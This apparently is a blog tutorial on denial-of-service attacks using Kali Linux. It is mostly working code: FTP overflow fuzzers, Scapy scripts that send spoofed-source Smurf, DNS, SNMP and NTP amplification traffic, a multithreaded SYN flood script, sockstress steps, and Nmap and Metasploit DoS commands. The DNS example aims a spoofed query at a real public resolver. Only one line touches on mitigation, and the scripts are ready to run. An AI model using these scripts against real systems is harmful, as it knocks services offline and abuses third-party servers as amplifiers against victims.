Practical Techniques for Network-Based Denial of Service Attacks in Kali Linux

Denial-of-service (DoS) attacks aim to disrupt access to network resources by exhausting bandwidth, memory, processing capacity, or other critical system assets. Understanding their mechanics helps assess threats and design mitigations.

Buffer Overflow via Fuzzing

Fuzzing uncovers buffer overflow vulnerabilities by feeding malformed or random input to a program functon. If input exceeds allocated storage, adjacent memory may be overwritten, causing crashes or undefined behavior.

A custom Python fuzzer for FTP services can automate this test. The tool connects to a target, authenticates, and appends incrementally larger payloads to a chosen command.

#!/usr/bin/python
import socket
import sys

if len(sys.argv) != 6:
    print("Usage: ./ftp_tester.py <target_ip> <port> <char_seq> <step> <limit>")
    sys.exit()

target_ip = sys.argv[1]
port = int(sys.argv[2])
char_seq = sys.argv[3]
step = int(sys.argv[4])
limit = int(sys.argv[5])

user = input("FTP user: ")
passwd = input("FTP pass: ")
cmd = input("Command to test: ")

payload_len = step
while payload_len <= limit:
    try:
        payload = cmd + " " + (char_seq * payload_len)
        print(f"Sending length {payload_len}")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, port))
        s.recv(1024)
        s.send(f'USER {user}\r\n'.encode())
        s.recv(1024)
        s.send(f'PASS {passwd}\r\n'.encode())
        s.recv(1024)
        s.send(f'{payload}\r\n'.encode())
        s.send(b'QUIT\r\n')
        s.recv(1024)
        s.close()
        payload_len += step
    except Exception:
        print("Server likely crashed")
        break
else:
    print("No crash detected")

Increasing payload sizes stresses the parser. A crash indicates potential overflow.

FTP Buffer Overflow Exploitation

Certain FTP servers mishandle newline sequences in commands. By sending excessive \n to the MKD command after authentication, the stack can be corrupted.

Modified fuzzer example:

#!/usr/bin/python
import socket
import sys

if len(sys.argv) != 5:
    print("Usage: ./ftp_nl_test.py <target_ip> <port> <step> <limit>")
    sys.exit()

target_ip = sys.argv[1]
port = int(sys.argv[2])
step = int(sys.argv[3])
limit = int(sys.argv[4])

user = input("FTP user: ")
passwd = input("FTP pass: ")
cmd = input("Command: ")

nl_count = step
while nl_count <= limit:
    try:
        payload = cmd + " " + ('\n' * nl_count)
        print(f"Sending {nl_count} newlines")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, port))
        s.recv(1024)
        s.send(f'USER {user}\r\n'.encode())
        s.recv(1024)
        s.send(f'PASS {passwd}\r\n'.encode())
        s.recv(1024)
        s.send(f'{payload}\r\n'.encode())
        s.send(b'QUIT\r\n')
        s.recv(1024)
        s.close()
        nl_count += step
    except Exception:
        print("Possible crash")
        break
else:
    print("No crash observed")

Smurf Amplification Attack

Smurf abuses directed broadcast addresses with spoofed ICMP echo requests. Network devices reply to the forged source, multiplying traffic toward the victim.

Using Scapy:

from scapy.all import *

# Construct ICMP request with spoofed source
ip_layer = IP(src="172.16.36.135", dst="172.16.36.255")
icmp_layer = ICMP(type=8)
packet = ip_layer / icmp_layer

# Send multiple times
send(packet, count=100, verbose=1)

Modern networks often block directed broadcasts, reducing effectiveness.

DNS Amplification Attack

Open DNS resolvers return large responses to small queries. Spoofing the victim's address as the query source floods it with amplified replies.

Scapy example for ANY record lookup:

from scapy.all import *
ip = IP(dst="208.67.220.220", src="172.16.36.135")
udp = UDP(dport=53)
dns_q = DNS(rd=1, qdcount=1, qd=DNSQR(qname="google.com", qtype=255))
req = ip / udp / dns_q
send(req, count=2, verbose=1)

Response size exceeds request size, enabling traffic multiplication.

SNMP Amplification Attack

Misconfigured SNMP agents with public community strings respond to bulk requests with extensive device info. Spoofed-source queries redirect large responses toward victims.

Scapy example:

from scapy.all import *
ip = IP(dst="172.16.36.134", src="172.16.36.135")
udp = UDP(sport=161, dport=161)
snmp = SNMP(version=2, community="public", PDU=SNMPbulk(max_repetitions=50, varbindlist=[
    SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1")),
    SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.19.1.3"))]))
req = ip / udp / snmp
send(req, count=2, verbose=1)

NTP Amplification Attack

The monlist command in older NTP servers returns recent client addresses. A single request elicits a large reply, and source spoofing redirects it.

Discovery with Nmap and ntpdc:

nmap -sU 172.16.36.224 -p 123
ntpdc -n -c monlist 172.16.36.224

Lack of response implies patched or hardened server.

SYN Flood Resource Exhaustion

SYN flood opens many TCP half-connections by sending SYN packets without completing handshakes, overwhelming conncetion tables.

Multithreaded Scapy approach:

#!/usr/bin/python
from scapy.all import *
import random
import threading
import sys

def flood(tgt_ip, tgt_port):
    while True:
        src_port = random.randint(0, 65535)
        send(IP(dst=tgt_ip) / TCP(sport=src_port, dport=tgt_port, flags="S"), verbose=0)

if len(sys.argv) != 4:
    print("Usage: ./synflood.py <target_ip> <port> <threads>")
    sys.exit()

target = sys.argv[1]
port = int(sys.argv[2])
th_cnt = int(sys.argv[3])

for _ in range(th_cnt):
    threading.Thread(target=flood, args=(target, port)).start()

Unique source ports increase half-open connection count.

Sockstress Attack

Sockstress maintains persistent connections with zero receive window, forcing the server to buffer data indefinitely.

Key elements:

Modify iptables to block outbound RST packets.
Send TCP SYNs, then ACKs with window size 0.
Hold connections to exhaust memory.

Script-Based DoS with Nmap NSE

Nmap scripting engine includes DoS modules, e.g., smb-vuln-ms10-054. Usage:

nmap -p 445 172.16.36.134 --script=smb-vuln-ms10-054 --script-args unsafe=1

These leverage known vulnerabilities to trigger crashes or reboots.

Metasploit Auxiliary DoS Modules

Metasploit provides prebuilt DoS modules under auxiliary/dos/. Discover with:

msfconsole
search dos
use auxiliary/dos/windows/smb/ms06_063_trans
set RHOST 172.16.36.134
run

Modules automate exploit delivery for various services.

Public Exploit Databases

Repositories like Exploit-DB catalog DoS scripts. Locate candidates:

grep -i "smb.*dos" /usr/share/exploitdb/files.csv

Review, adapt, and test scripts cautiously against isolated targets.

Tags: Denial of Service DoS Attack Buffer Overflow Amplification Attack SYN Flood

Posted on Mon, 01 Jun 2026 01:33:32 +0000 by rahnel

Freaks City